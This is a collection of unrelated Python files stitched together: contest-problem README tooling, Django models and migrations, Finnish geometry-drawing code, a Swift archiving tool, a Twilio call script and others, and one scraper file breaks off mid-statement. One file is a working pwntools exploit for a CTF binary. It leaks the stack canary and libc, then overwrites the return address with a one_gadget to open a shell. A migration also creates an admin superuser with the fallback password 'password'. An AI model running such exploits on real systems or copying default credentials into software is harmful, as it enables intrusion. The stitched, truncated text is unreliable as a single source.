self.header = ["title", "solution", "url"]
def getHeader(self):
return markdownRow(self.header)
def __str__(self):
return markdownRow(
[
self.title,
f"[{self.language_icon}]({self.location})",
f"[]({self.url})",
]
)
class KattisProblem(Problem):
def __init__(self, location: Path):
super().__init__(location)
self.url = f"https://open.kattis.com/problems/{self.title}"
self.header = ["title", "solution", "url"]
def getHeader(self):
return markdownRow(self.header)
def __str__(self):
return markdownRow(
[
self.title,
f"[{self.language_icon}]({self.location})",
f"[]({self.url})",
]
)
def collectProblemsWithRoot(root: Path):
problems = []
for language in LANGUAGES:
problems_in_language = root.glob(f"**/*.{language}")
problems.extend([Problem(p) for p in problems_in_language])
problems.sort(key=lambda p: p.title)
return problems
def collectKattisProblems():
problems = []
for language in LANGUAGES:
problems_in_language = ROOTS["kattis"].glob(f"*/*.{language}")
problems.extend([KattisProblem(p) for p in problems_in_language])
problems.sort(key=lambda p: p.title)
return problems
def collectCodeChefProblems():
problems = []
for language in LANGUAGES:
problems_in_language = ROOTS["codechef"].glob(f"*/*.{language}")
problems.extend([CodeChefProblem(p) for p in problems_in_language])
problems.sort(key=lambda p: p.title)
return problems
def collectAdventOfCodeProblems():
problems = []
for language in LANGUAGES:
problems_in_language = ROOTS["advent-of-code"].glob(f"**/*.{language}")
grouped_problems = {}
for p in problems_in_language:
root = p.parent
if root not in grouped_problems:
grouped_problems[root] = [p]
else:
grouped_problems[root].append(p)
for key, value in grouped_problems.items():
if len(value) == 1:
grouped_problems[key].append(None)
else:
grouped_problems[key].sort()
problems.extend([AdventOfCodeProblem(*v) for k, v in grouped_problems.items()])
problems.sort(key=lambda p: int(p.year + p.day))
return problems
def collectProblems():
return {
"advent-of-code": collectAdventOfCodeProblems(),
"codechef": collectCodeChefProblems(),
"kattis": collectKattisProblems(),
}
def problemsAsTable(section, problems):
SECTION = f"# {section}"
HEADER = problems[0].getHeader()
DIVIDER = re.sub("[a-z]", "-", HEADER)
DIVIDER = re.sub("[0-9]", "-", DIVIDER)
table = [SECTION, HEADER, DIVIDER]
for p in problems:
table.append(str(p))
return "\n".join(table)
def generateStatistics(problems, keys):
HEADER = "|Provider|Problem count|"
DIVIDER = "|-|-|"
table = [HEADER, DIVIDER]
for k in keys:
table.append(f"|[{k}](#{k})|{len(problems[k])}|")
return "\n".join(table)
def generate():
problems = collectProblems()
content = [
INTRODUCTION,
generateStatistics(problems, ["advent-of-code", "codechef", "kattis"]),
problemsAsTable("Advent of Code", problems["advent-of-code"]),
problemsAsTable("Codechef", problems["codechef"]),
problemsAsTable("Kattis", problems["kattis"]),
"",
"Icons from [Icons8](https://icons8.com)",
]
print(content)
with open("README.md", "w") as fh:
fh.write("\n".join(content))
if __name__ == "__main__":
generate()
|
# Generated by Django 3.2.5 on 2021-07-12 22:28
from django.db import migrations
from django.conf import settings
def ensure_share_system_user(apps, schema_editor):
ShareUser = apps.get_model('share', 'ShareUser')
Source = apps.get_model('share', 'Source')
system_user = ShareUser.objects.filter(username=settings.APPLICATION_USERNAME).first()
if system_user is None:
system_user = ShareUser.objects.create_robot_user(
username=settings.APPLICATION_USERNAME,
robot='',
is_trusted=True,
)
Source.objects.update_or_create(
user=system_user,
defaults={
'name': settings.APPLICATION_USERNAME,
'long_title': 'SHARE System',
'canonical': True,
}
)
def ensure_share_admin_user(apps, schema_editor):
import os
ShareUser = apps.get_model('share', 'ShareUser')
admin_username = 'admin'
admin_user_exists = ShareUser.objects.filter(username=admin_username).exists()
if not admin_user_exists:
ShareUser.objects.create_superuser(
admin_username,
os.environ.get('SHARE_ADMIN_PASSWORD', 'password')
)
class Migration(migrations.Migration):
dependencies = [
('share', '0060_auto_20210712_1715'),
]
operations = [
migrations.RunPython(
code=ensure_share_system_user,
),
migrations.RunPython(
code=ensure_share_admin_user,
),
]
|
from django.db import models
class Sensor(models.Model):
name = models.CharField(max_length=50)
abbreviation = models.CharField(max_length=30)
description = models.TextField()
unit_of_measure = models.CharField(max_length=20)
picture = models.ImageField(upload_to="media/", null=True)
type = models.CharField(
max_length = 15,
choices = ( ('Physical', 'PHYSICAL' ), ('Virtual', 'VIRTUAL') ),
null=True
) #a virtual sensor is a sensor whose value is calculated from other real physical values
added_time = models.DateTimeField(auto_now_add=True)
class Meta:
db_table = 'sensor'
default_permissions = ('view', 'add', 'change', 'delete' )
def added_time_pretty(self):
return self.added_time.strftime("%d %B %Y")
def description_short(self):
return self.description[:300]
|
from pwn import *
import sys
#config
context(os='linux', arch='i386')
context.log_level = 'debug'
FILE_NAME = "../bin/skywriting"
HOST = "2020.redpwnc.tf"
PORT = 31034
if len(sys.argv) > 1 and sys.argv[1] == 'r':
conn = remote(HOST, PORT)
else:
conn = process(FILE_NAME)
elf = ELF(FILE_NAME)
libc = ELF('../libc.so.6')
#libc_binsh = next(libc.search("/bin/sh"))
gadget = [0x4f2c5, 0x4f322, 0x10a38c]
off_main_ret = 0x21b97
def exploit():
notflag = "notflag{a_cloud_is_just_someone_elses_computer}\n\x00"
conn.sendlineafter("sky? \n", "1")
# canary leak
payload = "A"*0x88
payload += "B"
conn.sendafter("shot: ", payload)
conn.recvuntil("AB")
canary = "\x00" + conn.recv(7)
# libc leak
payload = "A"*0x97
payload += "B"
conn.sendafter("shot: ", payload)
conn.recvuntil("AB")
libc_main_ret = u64(conn.recv(6)+"\x00\x00")
libc_base = libc_main_ret - off_main_ret
one_gadget = libc_base + gadget[0]
print hex(libc_base)
# set canary and one_gadget
payload = "\x00"*0x88
payload += canary
payload += "\x00"*8
payload += p64(one_gadget)
conn.sendafter("shot: ", payload)
conn.sendlineafter("shot: ", notflag)
conn.interactive()
if __name__ == "__main__":
exploit()
|
import configparser
config = configparser.ConfigParser()
def read_property_file(section,key):
config.read('C:/Users/richa.anand/PycharmProjects/POM_Using_Pytest/Pom_Project/Config/config.properties')
sec = dict(config.items(section))
print(sec[key])
return sec[key]
|
# -*- coding: UTF-8 -*-
import kuva
from kuva import *
import kuvaaja
def piste(x, y, nimi = "", suunta = 0, piirra = True):
"""Piirtää pisteen (x, y). Nimi kirjoitetaan suuntaan 'suunta' (asteina).
Palauttaa pisteen (x, y)."""
P = (x, y)
if piirra: kuva.piste((x, y), nimi, suunta)
return P
def leikkauspiste(X, Y, nimi = "", suunta = 0, valinta = 0, piirra = True):
"""Toimii kuten funktio piste, mutta pisteen paikka määräytyy kahdesta
geometrisesta oliosta X ja Y (suora, jana, puolisuora, ympyrä ...). Jos
leikkauspisteitä on useampia, 'valinta'-parametri (arvo 0, 1, ...) määrää
mikä niistä valitaan. Samalla kuvalla valinnan pitäisi toimia aina samalla
tavalla."""
if(X["tyyppi"] == "suora" and Y["tyyppi"] == "suora"):
x1 = float(X["A"][0])
y1 = float(X["A"][1])
x2 = float(X["B"][0])
y2 = float(X["B"][1])
u1 = float(Y["A"][0])
v1 = float(Y["A"][1])
u2 = float(Y["B"][0])
v2 = float(Y["B"][1])
t = (u2 * v1 - u1 * v2 + u1 * y1 + v2 * x1 - u2 * y1 - v1 * x1) / ((u2 - u1) * (y2 - y1) + (v1 - v2) * (x2 - x1))
x = x1 + t * (x2 - x1)
y = y1 + t * (y2 - y1)
elif(X["tyyppi"] == "suora" and Y["tyyppi"] == "ympyra"):
U = float(X["A"][0])
V = float(X["A"][1])
u = float(X["B"][0]) - U
v = float(X["B"][1]) - V
a = float(Y["keskipiste"][0])
b = float(Y["keskipiste"][1])
r = float(Y["sade"])
A = u**2 + v**2
B = 2 * u * (U - a) + 2 * v * (V - b)
C = (U - a)**2 + (V - b)**2 - r**2
diskr = B**2 - 4 * A * C
if diskr < 0:
diskrsqrt = 0
elif valinta % 2 == 0:
diskrsqrt = sqrt(diskr)
else:
diskrsqrt = -sqrt(diskr)
t = (-B + diskrsqrt) / (2 * A)
x = U + t * u
y = V + t * v
elif(X["tyyppi"] == "ympyra" and Y["tyyppi"] == "suora"):
return leikkauspiste(Y, X, nimi, suunta, valinta, piirra)
else:
raise ValueError("leikauspiste: en osaa laskea näiden olioiden leikkauspistettä.")
return piste(x, y, nimi, suunta, piirra)
def projektio(P, s, nimi = "", suunta = 0, piirra = True):
"""Piirtää pisteen P projektion suoralle s."""
u = float(s["B"][0] - s["A"][0])
v = float(s["B"][1] - s["A"][1])
t = (u * (P[0] - s["A"][0]) + v * (P[1] - s["A"][1])) / (u**2 + v**2)
proj = interpoloi(s["A"], s["B"], t)
return piste(proj[0], proj[1], nimi, suunta, piirra)
def suora(A, B, nimi = "", kohta = 0.5, puoli = True, piirra = True, Ainf = True, Binf = True):
"""Piirtää suoran/puolisuoran/janan joka kulkee pisteiden A ja B kautta.
Nimi kirjoitetaan kohtaan 'kohta', missä A on kohdassa 0 ja B kohdassa 1.
'puoli'-parametri määrää kummalle puolelle suoraa nimi merkitään. Jos parametri
'Ainf' on true, suoran A:n puoleinen osa on rajoittamaton, vastaavasti 'Binf'.
Palautaa suoraolion."""
if(A == B): B = (B[0] + 0.01, B[1])
if piirra:
if Ainf:
t = rajoitaLaatikkoon(B, A)
if t == float("inf"): raise ValueError("suora: Ei voida piirtää rajoittamatonta suoraa. Rajaa kuva rajaa-funktiolla.")
Ap = vekSumma(vekSkaalaa(B, 1 - t), vekSkaalaa(A, t))
else:
Ap = A
if Binf:
t = rajoitaLaatikkoon(A, B)
if t == float("inf"): raise ValueError("suora: Ei voida piirtää rajoittamatonta suoraa. Rajaa kuva rajaa-funktiolla.")
Bp = vekSumma(vekSkaalaa(A, 1 - t), vekSkaalaa(B, t))
else:
Bp = B
paksuus = "{}pt".format(tikzLuku(0.75 * tila.haePaksuus()))
tila.out.write("\\draw[line width={}] {} -- {};\n".format(paksuus, tikzPiste(muunna(Ap)), tikzPiste(muunna(Bp))))
suunta = 180 * atan2(B[0] - A[0], -(B[1] - A[1])) / pi
nimeaPiste(interpoloi(A, B, kohta), nimi, suunta + 180 * int(puoli))
return {"tyyppi": "suora", "A": A, "B": B}
def jana(A, B, nimi = "", kohta = 0.5, puoli = True, piirra = True):
"""Vastaa funktiota suora kun Ainf = False ja Binf = False."""
return suora(A, B, nimi, kohta, puoli, piirra, False, False)
def puolisuora(A, B, nimi = "", kohta = 0.5, puoli = True, piirra = True):
"""Vastaa funktiota suora kun Ainf = False ja Binf = True."""
return suora(A, B, nimi, kohta, puoli, piirra, False, True)
def suoraSuuntaan(A, u, v, nimi = "", kohta = 0.5, puoli = True, piirra = True):
"""Piirtää suoran A:sta suuntaan (u, v)."""
return suora(A, (A[0] + u, A[1] + v), nimi, kohta, puoli, piirra)
def puolisuoraSuuntaan(A, u, v, nimi = "", kohta = 0.5, puoli = True, piirra = True):
"""Piirtää puolisuoran A:sta suuntaan (u, v)."""
return puolisuora(A, (A[0] + u, A[1] + v), nimi, kohta, puoli, piirra)
def kaari(keskipiste, sade, alkukulma, loppukulma, nimi = "", kohta = 0, puoli = True, piirra = True):
"""Sama kuin 'ympyra', mutta piirtää vain kaaren kulmasta 'alkukulma' kulmaan 'loppukulma'."""
if(piirra):
with paksuus(0.75):
kuvaaja.piirraParametri(
lambda t: keskipiste[0] + sade * cos(t), lambda t: keskipiste[1] + sade * sin(t),
pi * alkukulma / 180, pi * loppukulma / 180, nimi, pi * kohta / 180, kohta + 180 * int(not puoli)
)
return {"tyyppi": "ympyra", "keskipiste": keskipiste, "sade": sade}
def ympyra(keskipiste, sade, nimi = "", kohta = 0, puoli = True, piirra = True):
"""Piirtää ympyrän keskipisteenä 'keskipiste' ja säteenä 'sade'. Ympyrän
nimi piirretään kohtaan 'kohta' (asteina ympyrän kaarella), 'puoli' kertoo
kummalle puolelle. Palauttaa ympyräolion."""
return kaari(keskipiste, sade, 0, 360, nimi, kohta, puoli, piirra)
def etaisyys(A, B):
"""Laske etäisyys pisteestä A pisteeseen B."""
dx = B[0] - A[0]
dy = B[1] - A[1]
return sqrt(dx**2 + dy**2)
def ymparipiirrettyYmpyra(A, B, C, nimi = "", kohta = 0, puoli = True, piirra = True):
"""Sama kuin 'ympyra', mutta ympyräksi valitaan kolmion ABC ympäripiirretty
ympyrä."""
ax = float(A[0])
ay = float(A[1])
bx = float(B[0])
by = float(B[1])
cx = float(C[0])
cy = float(C[1])
# TODO: simplify
x = 0.5 * (
-ay*bx*bx+bx*bx*cy-by*cy*cy+by*ay*ay+ay*cx*cx-by*by*ay
-by*cx*cx+ax*ax*by-cy*ay*ay+by*by*cy-ax*ax*cy+cy*cy*ay
) / (
ax*by-ax*cy-ay*bx+ay*cx+bx*cy-by*cx
)
y = -0.5 * (
-ax*bx*bx-ax*by*by+ax*cx*cx+ax*cy*cy+ax*ax*bx-ax*ax*cx
+ay*ay*bx-ay*ay*cx-bx*cx*cx-bx*cy*cy+bx*bx*cx+by*by*cx
) / (
ax*by-ax*cy-ay*bx+ay*cx+bx*cy-by*cx
)
keskipiste = (x, y)
sade = etaisyys(keskipiste, A)
return ympyra(keskipiste, sade, nimi, kohta, puoli, piirra)
def ympyranKeskipiste(w, nimi = "", suunta = 0, piirra = True):
"""Toimii kuten funktio piste, mutta valitsee pisteeksi ympyrän w keskipisteen."""
return piste(w["keskipiste"][0], w["keskipiste"][1], nimi, suunta, piirra)
def ympyranKehapiste(w, kohta, nimi = "", suunta = 0, piirra = True):
"""Piirtää ympyrän w kehäpisteen kohtaan 'kohta' asteina."""
kohta = pi * kohta / 180
sade = w["sade"]
return piste(w["keskipiste"][0] + sade * cos(kohta), w["keskipiste"][1] + sade * sin(kohta), nimi, suunta, piirra)
def kulma(A, B, C, nimi = "", monista = 1, kasvata = 0, suunta = None, piirra = True):
"""Piirtää kulman ABC. Kulma piirretään 'monista'-kertaisena. Kulmaympyrän
sädettä kasvatetaan arvolla 'kasvata' tavallisesta. Nimen merkitsemissuunta
valitaan 'suunta'-parametrilla. Palauttaa kulmaolion."""
alkukulma = atan2(A[1] - B[1], A[0] - B[0])
loppukulma = atan2(C[1] - B[1], C[0] - B[0])
if(loppukulma < alkukulma): loppukulma += 2 * pi
if piirra:
Ap = muunna(A)
Bp = muunna(B)
Cp = muunna(C)
alkukulmap = atan2(Ap[1] - Bp[1], Ap[0] - Bp[0])
loppukulmap = atan2(Cp[1] - Bp[1], Cp[0] - Bp[0])
if(loppukulmap < alkukulmap): loppukulmap += 2 * pi
valikulmap = 0.5 * (alkukulmap + loppukulmap)
nimip = valikulmap
if suunta is not None:
nimip = pi * suunta / 180
kulmap = loppukulmap - alkukulmap
sade = min(max(0.35 / kulmap, 0.5), 3) + kasvata
with oletusasetukset():
paksuus(0.45)
for i in range(monista):
kuvaaja.piirraParametri(
lambda t: Bp[0] + sade * cos(t), lambda t: Bp[1] + sade * sin(t),
alkukulmap, loppukulmap, nimi, nimip, 180 * nimip / pi
)
nimi = ""
sade -= 0.04
return {"tyyppi": kulma, "alkukulma": alkukulma, "loppukulma": loppukulma}
def suorakulma(A, B, piirra = True):
"""Piirtää suoran kulman pisteeseen B siten että oikea kylki on kohti A:tä."""
if piirra:
Ap = muunna(A)
Bp = muunna(B)
d = etaisyys(Ap, Bp)
u = 0.3 * (Ap[0] - Bp[0]) / d
v = 0.3 * (Ap[1] - Bp[1]) / d
paksuus = "{}pt".format(tikzLuku(0.45 * tila.haePaksuus()))
tila.out.write("\\draw[line width={}] {} -- {} -- {};\n".format(
paksuus,
tikzPiste(vekSumma(Bp, (u, v))),
tikzPiste(vekSumma(Bp, (u - v, u + v))),
tikzPiste(vekSumma(Bp, (-v, u)))
))
alkukulma = atan2(A[1] - B[1], A[0] - B[0])
loppukulma = alkukulma + pi / 2
return {"tyyppi": kulma, "alkukulma": alkukulma, "loppukulma": loppukulma}
|
#Programa: tiempo.py
#Propósito: Realiza un programa que reciba una cantidad de minutos y muestre por pantalla a cuantas horas y minutos corresponde.
#Autor: Jose Manuel Serrano Palomo.
#Fecha: 13/10/2019
#
#Variables a usar:
# mins serán los minutos que vamos a convertir en tiempo.
# horas,minutos son los resultados que luego usaremos.
# h lo usaremos para calcular los minutos
#
#Algoritmo:
# LEER mins
# horas <-- h <-- mins / 60
# horas <-- math.floor(horas)
#h -<-- math.floor(h)
# minutos <-- h * 60
# ESCRIBIR horas y minutos
print("Minutos a horas y minutos")
print("-----------------------\n")
import math
#Leemos los datos
mins = float(input("introduce los minutos: "))
#Calculamos
horas = h = mins / 60
horas = math.floor(horas)
h -= math.floor(h)
minutos = round(h * 60)
#Escribimos el resultado
print("El resultado es :", horas, " horas y ", minutos, " minutos")
|
#!/usr/bin/env python3
# File Name: Report.py
# Created by: Vadim Lakhterman
# Date: 24.5.20
# Last Update: 25.5.20
import time
import os
import os.path
import Pattern
from Pattern import *
RESULTS_FOLDER = 'Results'
RESULTS_FILENAME = RESULTS_FOLDER + '/' + 'results'
TIME = time.strftime("%d%m%y_%H%M%S")
FORMAT = '.json'
class Report:
def __init__(self):
if (not os.path.exists(RESULTS_FOLDER)):
os.mkdir(RESULTS_FOLDER)
with open(RESULTS_FILENAME + '_' + TIME + FORMAT, 'w+') as self.file:
self.file.write("{\n\"Results\": [\n")
def write_new_test_results(self, name):
with open(RESULTS_FILENAME + '_' + TIME + FORMAT, 'a+') as self.file:
self.file.write("{\n\"" + name + "\": [\n")
def close_test_results(self):
with open(RESULTS_FILENAME + '_' + TIME + FORMAT, 'a+') as self.file:
self.file.write("]\n}\n")
def write_result(self, data):
results = data.toDict()
with open(RESULTS_FILENAME + '_' + TIME + FORMAT, 'a+') as self.file:
self.file.write(json.dumps({"found " : results}, indent=4, cls=PatternEncoder))
def finish(self):
with open(RESULTS_FILENAME + '_' + TIME + FORMAT, 'a+') as self.file:
self.file.write("]\n}\n") |
#!/usr/bin/env python3
import os,sys,getopt,tarfile
import getpass
from distutils.spawn import find_executable
import time
import socket
import optparse
import subprocess
import multiprocessing
from swiftclient import Connection
from swiftclient import shell
from swiftclient import RequestException
from swiftclient.exceptions import ClientException
from swiftclient.multithreading import OutputManager
swift_auth=os.environ.get("ST_AUTH")
haz_pigz=False
# define minimum parser object to allow swiftstack shell to run
def shell_minimal_options():
global swift_auth
parser = optparse.OptionParser()
parser.add_option('-A', '--auth', dest='auth',
default=swift_auth)
parser.add_option('-V', '--auth-version',
default=os.environ.get('ST_AUTH_VERSION',
(os.environ.get('OS_AUTH_VERSION','1.0'))))
parser.add_option('-U', '--user', dest='user',
default=os.environ.get('ST_USER'))
parser.add_option('-K', '--key', dest='key',
default=os.environ.get('ST_KEY'))
parser.add_option('--os_user_id')
parser.add_option('--os_user_domain_id')
parser.add_option('--os_user_domain_name')
parser.add_option('--os_tenant_id')
parser.add_option('--os_tenant_name')
parser.add_option('--os_project_id')
parser.add_option('--os_project_domain_id')
parser.add_option('--os_project_name')
parser.add_option('--os_project_domain_name')
parser.add_option('--os_service_type')
parser.add_option('--os_endpoint_type')
parser.add_option('--os_auth_token')
parser.add_option('--os_storage_url')
parser.add_option('--os_region_name')
parser.add_option('-v', '--verbose', action='count', dest='verbose',
default=1, help='Print more info.')
return parser
# wrapper function for swiftstack shell functions
def sw_shell(sw_fun,*args):
args = ('',) + args
with OutputManager() as output:
parser = shell_minimal_options()
try:
sw_fun(parser, list(args), output)
except (ClientException, RequestException, socket.error) as err:
output.error(str(err))
def sw_stat(*args):
sw_shell(shell.st_stat,*args)
def sw_ls(*args):
sw_shell(shell.st_list,*args)
def sw_download(*args):
sw_shell(shell.st_download,*args)
def sw_upload(*args):
sw_shell(shell.st_upload,*args)
def sw_post(*args):
sw_shell(shell.st_post,*args)
# suffix of archive files
tar_suffix=".tar.gz"
bundle_id=".bundle"
root_id=".root"
# True if 1st char of path member is '.' else False
def is_hidden_dir(dir_name):
for item in dir_name.split('/'):
if item[0]=='.':
return True
return False
def print_flush(str):
sys.stdout.write(str+'\n')
sys.stdout.flush()
# apparently getpid is ok because it's different between mp tasks
def unique_id():
return str(os.getpid())
def create_tar_file(filename,src_path,file_list):
global haz_pigz
tar_params=["tar","cvf",filename,"--directory="+src_path]
if haz_pigz:
tar_params=tar_params+["--use-compress-program=pigz"]
if len(file_list)>16:
tmp_file=".tar."+unique_id()
with open(tmp_file,"w") as f:
for file in file_list:
f.write(file+'\n')
subprocess.call(tar_params+["-T",tmp_file])
os.unlink(tmp_file)
else:
subprocess.call(tar_params+file_list)
def upload_file_to_swift(filename,swiftname,container):
sw_upload("--object-name="+swiftname,
"--segment-size=2147483648",
"--use-slo",
"--segment-container=.segments_"+container,
"--header=X-Object-Meta-Uploaded-by:"+getpass.getuser(),
container,filename)
def append_bundle(tar,src_path,file_list,rel_path):
for file in file_list:
src_file=os.path.join(src_path,file)
tar.add(src_file,os.path.join(rel_path,file))
print_flush(src_file)
def start_bundle(src_path,file_list,tmp_dir,rel_path,prefix):
global tar_suffix
global bundle_id
# archive_name is name for archived object
archive_name=os.path.join(prefix,
os.path.basename(src_path)+bundle_id+tar_suffix)
#print("creating bundle",archive_name)
# temp_archive_name is name of local tar file
temp_archive_name=unique_id()+os.path.basename(archive_name)
if tmp_dir:
temp_archive_name=os.path.join(tmp_dir,temp_archive_name)
# Create local tar file
tar=tarfile.open(temp_archive_name,"w:gz")
append_bundle(tar,src_path,file_list,rel_path)
return temp_archive_name,archive_name,tar
def end_bundle(tar,bundle_name,archive_name,container):
tar.close()
# Upload tar file to container as 'archive_name'
#print("uploading bundle as",archive_name)
upload_file_to_swift(bundle_name,archive_name,container)
os.unlink(bundle_name)
def archive_tar_file(src_path,file_list,container,tmp_dir,pre_path):
global tar_suffix
# archive_name is name for archived object
archive_name=pre_path+tar_suffix
# temp_archive_name is name of local tar file
temp_archive_name=unique_id()+os.path.basename(archive_name)
if tmp_dir:
temp_archive_name=os.path.join(tmp_dir,temp_archive_name)
# Create local tar file
create_tar_file(temp_archive_name,src_path,file_list)
# Upload tar file to container as 'archive_name'
upload_file_to_swift(temp_archive_name,archive_name,container)
# Delete local tar file
os.unlink(temp_archive_name)
# return total size of directory's files without children
def flat_dir_size(d,file_list):
size=0
for f in file_list:
ff=os.path.join(d,f)
if os.path.isfile(ff):
size=size+os.path.getsize(ff)
return size
def is_child_or_sib(dir_name,last_dir):
dname=os.path.dirname(dir_name)
return (dname==last_dir or dname==os.path.dirname(last_dir))
# param order: [src_path,file_list,container,tmp_dir,pre_path]
def archive_worker(queue):
while True:
item=queue.get(True)
if item is None: # exit on sentinel
break
archive_tar_file(item[0],item[1],item[2],item[3],item[4])
queue.task_done()
#print("DEBUG: archive_worker done",os.getpid())
queue.task_done()
def generic_q_close(q,par):
for i in range(par):
q.put(None) # send termination sentinel
#print("DEBUG:",os.getpid(),"waiting for join")
while not q.empty():
time.sleep(1)
#q.join()
q.close()
#print("DEBUG: all workers rejoined",os.getpid())
def archive_to_swift(local_dir,container,no_hidden,tmp_dir,bundle,prefix,par):
bundle_state=0
last_dir=""
archive_q=multiprocessing.JoinableQueue()
archive_pool=multiprocessing.Pool(par,archive_worker,(archive_q,))
for dir_name, subdir_list, file_list in os.walk(local_dir):
rel_path=os.path.relpath(dir_name,local_dir)
if (not (no_hidden and is_hidden_dir(rel_path)) and file_list):
dir_size=flat_dir_size(dir_name,file_list)
if bundle_state and is_child_or_sib(dir_name,last_dir):
bundle_state=bundle_state+dir_size
append_bundle(tar,dir_name,file_list,rel_path)
if bundle_state>=bundle:
end_bundle(tar,current_bundle,a_name,container)
bundle_state=0
else:
if bundle_state:
end_bundle(tar,current_bundle,a_name,container)
if dir_size<bundle:
current_bundle,a_name,tar=start_bundle(dir_name,file_list,
tmp_dir,rel_path,prefix)
#print("%s: start bundle %s @ %d" %
# (dir_name,current_bundle,dir_size))
bundle_state=dir_size
else:
# if files in root directory use basename of root
if rel_path==".":
rel_path=os.path.basename(dir_name)+root_id
#print("%s: not in bundle @ %d" % (dir_name,dir_size))
#archive_tar_file(dir_name,file_list,container,tmp_dir,
# os.path.join(prefix,rel_path))
archive_q.put([dir_name,file_list,container,tmp_dir,
os.path.join(prefix,rel_path)])
bundle_state=0
last_dir=dir_name
if bundle_state>0:
end_bundle(tar,current_bundle,a_name,container)
generic_q_close(archive_q,par)
# parse name into directory tree
def create_local_path(local_dir,archive_name):
global tar_suffix
path=os.path.join(local_dir,archive_name)
if path.endswith(tar_suffix):
path=path[:-len(tar_suffix)]
if not os.path.exists(path):
os.makedirs(path)
return path
def create_sw_conn():
global swift_auth
swift_user=os.environ.get("ST_USER")
swift_key=os.environ.get("ST_KEY")
if swift_auth and swift_user and swift_key:
return Connection(authurl=swift_auth,user=swift_user,key=swift_key)
print("Error: Swift environment not configured!")
def extract_tar_file(tarfile,termpath):
global haz_pigz
tar_params=["tar","xvf",tarfile,"--directory="+termpath]
if haz_pigz:
tar_params=tar_params+["--use-compress-program=pigz"]
subprocess.call(tar_params)
# param order: [tmp_dir,container,obj_name,local_dir]
def extract_worker(queue):
global tar_suffix
global bundle_id
global root_id
while True:
item=queue.get(True)
tmp_dir=item[0]
container=item[1]
obj_name=item[2]
local_dir=item[3]
# download tar file and extract into terminal directory
temp_file=unique_id()+tar_suffix
if tmp_dir:
temp_file=os.path.join(tmp_dir,temp_file)
sw_download("--output="+temp_file,container,obj_name)
# if bundle, extract using tar embedded paths
if obj_name.endswith(bundle_id+tar_suffix) or \
obj_name.endswith(root_id+tar_suffix):
term_path=local_dir
else:
term_path=create_local_path(local_dir,obj_name)
extract_tar_file(temp_file,term_path)
os.unlink(temp_file)
queue.task_done()
def extract_to_local(local_dir,container,no_hidden,tmp_dir,prefix,par):
global tar_suffix
global bundle_id
global root_id
swift_conn=create_sw_conn()
if swift_conn:
extract_q=multiprocessing.JoinableQueue()
extract_pool=multiprocessing.Pool(par,extract_worker,(extract_q,))
try:
headers,objs=swift_conn.get_container(container)
for obj in objs:
if obj['name'].endswith(tar_suffix):
if prefix and not obj['name'].startswith(prefix):
continue
if no_hidden and is_hidden_dir(obj['name']):
continue
# param order: [tmp_dir,container,obj_name,local_dir]
extract_q.put([tmp_dir,container,obj['name'],local_dir])
## download tar file and extract into terminal directory
#temp_file=str(os.getpid())+tar_suffix
#if tmp_dir:
# temp_file=os.path.join(tmp_dir,temp_file)
#sw_download("--output="+temp_file,container,obj['name'])
## if bundle, extract using tar embedded paths
#if obj['name'].endswith(bundle_id+tar_suffix) or \
# obj['name'].endswith(root_id+tar_suffix):
# term_path=local_dir
#else:
# term_path=create_local_path(local_dir,obj['name'])
#extract_tar_file(temp_file,term_path)
##with tarfile.open(temp_file,"r:gz") as tar:
## tar.extractall(path=term_path)
#os.unlink(temp_file)
except ClientException:
print("Error: cannot access Swift container '%s'!" % container)
generic_q_close(extract_q,par)
swift_conn.close()
def usage():
print("archive [parameters]")
print("Parameters:")
print("\t-l local_directory (default .)")
print("\t-c container (required)")
print("\t-x (extract from container to local directory)")
print("\t-n (no hidden directories)")
print("\t-t temp_dir (directory for temp files)")
print("\t-b bundle_size (in M or G)")
print("\t-a auth_token (default ST_AUTH)")
print("\t-p prefix")
print("\t-P parallel_instances (default 3)")
def validate_dir(path,param):
if not os.path.isdir(path):
print("Error: %s '%s' is not accessible!" % (param,path))
sys.exit()
if path[-1]=='/':
path=path[:-1]
return(path)
def validate_bundle(arg):
last=arg[-1].upper()
if last=='M':
bundle=int(arg[:-1])*1000000
elif last=='G':
bundle=int(arg[:-1])*1000000000
elif last.isdigit():
bundle=int(arg)
else:
print("Error: illegal bundle suffix '%c'" % last)
sys.exit()
return bundle
def main(argv):
global swift_auth
global haz_pigz
local_dir="."
container=""
tmp_dir=""
extract=False
no_hidden=False
bundle=0
prefix=""
par=3
try:
opts,args=getopt.getopt(argv,"l:c:t:b:a:p:P:xnh")
except getopt.GetoptError:
usage()
sys.exit()
for opt,arg in opts:
if opt in ("-h"):
usage()
sys.exit()
elif opt in ("-l"): # override default local directory
local_dir=validate_dir(arg,"local")
elif opt in ("-c"): # set container
container=arg
elif opt in ("-t"): # temp file directory
tmp_dir=validate_dir(arg,"tmp_dir")
elif opt in ("-b"): # bundle size
bundle=validate_bundle(arg)
elif opt in ("-a"): # override auth_token
swift_auth=arg
elif opt in ("-p"): # set prefix
prefix=arg
elif opt in ("-P"): # set parallel threads
par=int(arg)
elif opt in ("-x"): # extract mode
extract=True
elif opt in ("-n"): # set no-hidden flag to skip .*
no_hidden=True
if not container:
usage()
else:
if find_executable("pigz"):
haz_pigz=True
if extract:
extract_to_local(local_dir,container,no_hidden,tmp_dir,prefix,par)
else:
sw_post(container)
archive_to_swift(local_dir,container,no_hidden,tmp_dir,bundle,prefix,
par)
if __name__=="__main__":
main(sys.argv[1:])
|
import os
from twilio.rest import Client
account_sid = os.environ["TWILIO_ACCOUNT_SID"]
auth_token = os.environ["TWILIO_AUTH_TOKEN"]
client = Client(account_sid, auth_token)
call=client.calls.create(
to="+19254781531",
from_=os.environ["TWILIO_SMS_FROM"],
twiml='<Response><Say>Howdy, Anne!"</Say></Response>',
url="http://demo.twilio.com/docs/voice.xml"
)
print(call.sid)
|
import urllib.request
class Scraper(object):
def __init__(self, url):
self.url = url
def grab_contents(self):
self.bytes = urllib.request.urlopen(self.url)
self.data = self.bytes.read().decode('UTF-8')
self.
|
def cmpare(num2,prev):
county = 0
for i in range(len(prev)):
if num2[i]==prev[i]:
county+=1
if county == len(num2):
return True
else:
return False
#Fe
with open("spindownFe.txt","r") as f1, open("spinupdown_parsed.txt","w") as f2:
for line in f1:
numbers = line.split()
if len(numbers) == 4:
f2.write(line)
#Nb
with open("datasample2.txt","r") as f1, open("datasample2_parsed.txt","w") as f2:
for line in f1:
numbers = line.split()
if len(numbers) == 4:
f2.write(line)
num1_set = []
num2_set = []
with open("spinupdown_parsed.txt","r") as f1:
for line1 in f1:
num1 = line1.split()
num1 = map(float,num1)
num1_set.append(num1)
num1_no_repeats = [ele for ind, ele in enumerate(num1_set) if ele not in num1_set[:ind]]
